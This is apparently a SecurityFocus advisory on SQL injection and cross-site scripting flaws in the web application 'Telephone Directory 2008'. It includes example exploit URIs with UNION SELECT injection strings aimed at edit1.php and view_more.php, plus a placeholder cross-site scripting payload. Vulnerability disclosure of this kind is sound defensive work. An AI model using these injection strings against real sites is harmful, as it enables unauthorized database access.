Telephone Directory 2008 Multiple SQL Injection and Cross-Site Scripting Vulnerabilities

An attacker can exploit these issues via a browser. To exploit a cross-site scripting vulnerability, the attacker must entice a victim to follow a malicious URI.

The following example URIs are available:

http://www.example.com/[path]/edit1.php?action=confirm_data&code=1'/**/UNION/**/SELECT/**/1,name,3,4,5,6,7,8,9,10,11,12/**/FROM/**/dept/**/WHERE/**/ID='HOUS001

http://www.example.com/[path]/view_more.php?id=1'/**/UNION/**/SELECT/**/1,2,3,name,5/**/FROM/**/dept/**/WHERE/**/ID='INTX007812

http://www.example.com/[path]/edit1.php?action=<XSS>


 

Privacy Statement
Copyright 2010, SecurityFocus